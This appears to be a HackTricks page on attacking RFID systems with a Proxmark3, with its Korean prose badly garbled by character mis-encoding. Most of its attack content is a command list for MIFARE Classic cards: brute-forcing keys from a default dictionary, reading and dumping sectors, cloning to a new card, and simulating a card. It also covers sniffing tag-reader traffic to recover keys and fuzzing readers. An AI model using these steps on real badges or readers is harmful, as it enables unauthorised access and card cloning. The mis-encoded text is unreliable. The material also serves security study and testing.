# Proxmark 3
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Proxmark3λ‘ RFID μμ€ν
곡격νκΈ°
κ°μ₯ λ¨Όμ ν΄μΌ ν μΌμ [**Proxmark3**](https://proxmark.com)λ₯Ό κ°μ§κ³ [**μννΈμ¨μ΄μ κ·Έ μμ‘΄μ± μ€μΉνκΈ°**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)μ
λλ€.
### MIFARE Classic 1KB 곡격νκΈ°
**16κ°μ μΉν°**κ° μμΌλ©°, κ° μΉν°λ **4κ°μ λΈλ‘**μ κ°μ§κ³ μκ³ κ° λΈλ‘μ **16B**λ₯Ό ν¬ν¨ν©λλ€. UIDλ μΉν° 0 λΈλ‘ 0μ μμΌλ©° (λ³κ²½ν μ μμ΅λλ€).\
κ° μΉν°μ μ κ·Όνλ €λ©΄ **2κ°μ ν€** (**A**μ **B**)κ° νμνλ©°, μ΄ ν€λ **κ° μΉν°μ λΈλ‘ 3**μ μ μ₯λ©λλ€ (μΉν° νΈλ μΌλ¬). μΉν° νΈλ μΌλ¬λ λν **μ½κΈ° λ° μ°κΈ°** κΆνμ λΆμ¬νλ **μ κ·Ό λΉνΈ**λ₯Ό μ μ₯ν©λλ€.\
2κ°μ ν€λ 첫 λ²μ§Έ ν€λ₯Ό μκ³ μμΌλ©΄ μ½κΈ° κΆνμ λΆμ¬νκ³ λ λ²μ§Έ ν€λ₯Ό μκ³ μμΌλ©΄ μ°κΈ° κΆνμ λΆμ¬νλ λ° μ μ©ν©λλ€ (μλ₯Ό λ€μ΄).
μ¬λ¬ κ°μ§ 곡격μ μνν μ μμ΅λλ€.
```bash
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
Proxmark3λ **νκ·Έμ 리λ κ°μ ν΅μ μ λμ²**νμ¬ λ―Όκ°ν λ°μ΄ν°λ₯Ό μ°Ύλ λ±μ λ€λ₯Έ μμ
μ μνν μ μμ΅λλ€. μ΄ μΉ΄λμμλ ν΅μ μ μ€λννκ³ μ¬μ©λ ν€λ₯Ό κ³μ°ν μ μμ΅λλ€. μλνλ©΄ **μ¬μ©λ μνΈν μμ
μ΄ μ½νκΈ°** λλ¬Έμ νλ¬Έκ³Ό μνΈλ¬Έμ μκ³ μμΌλ©΄ μ΄λ₯Ό κ³μ°ν μ μμ΅λλ€(`mfkey64` λꡬ).
### Raw Commands
IoT μμ€ν
μ λλλ‘ **λΉλΈλλ λλ λΉμμ
μ νκ·Έ**λ₯Ό μ¬μ©ν©λλ€. μ΄ κ²½μ° Proxmark3λ₯Ό μ¬μ©νμ¬ νκ·Έμ μ¬μ©μ μ μ **μμ λͺ
λ Ήμ μ μ‘**ν μ μμ΅λλ€.
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
μ΄ μ 보λ₯Ό ν΅ν΄ μΉ΄λμ λν μ 보μ μΉ΄λμ ν΅μ νλ λ°©λ²μ κ²μν μ μμ΅λλ€. Proxmark3λ λ€μκ³Ό κ°μ μμ λͺ
λ Ήμ μ μ‘ν μ μμ΅λλ€: `hf 14a raw -p -b 7 26`
### Scripts
Proxmark3 μννΈμ¨μ΄μλ κ°λ¨ν μμ
μ μννλ λ° μ¬μ©ν μ μλ **μλν μ€ν¬λ¦½νΈ**μ 미리 λ‘λλ λͺ©λ‘μ΄ ν¬ν¨λμ΄ μμ΅λλ€. μ 체 λͺ©λ‘μ κ²μνλ €λ©΄ `script list` λͺ
λ Ήμ μ¬μ©νμμμ€. λ€μμΌλ‘, `script run` λͺ
λ Ήμ μ¬μ©νκ³ μ€ν¬λ¦½νΈμ μ΄λ¦μ μ
λ ₯νμμμ€:
```
proxmark3> script run mfkeys
```
λΉμ μ **νκ·Έ 리λ**λ₯Ό **νΌμ¦**νκΈ° μν μ€ν¬λ¦½νΈλ₯Ό λ§λ€ μ μμ΅λλ€. μ ν¨ν **μΉ΄λ**μ λ°μ΄ν°λ₯Ό 볡μ¬νλ €λ©΄, νλ μ΄μμ 무μμ **λ°μ΄νΈ**λ₯Ό **무μμν**νκ³ κ° λ°λ³΅μμ **리λκ° μΆ©λνλμ§** νμΈνλ **Lua μ€ν¬λ¦½νΈ**λ₯Ό μμ±νμΈμ.
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}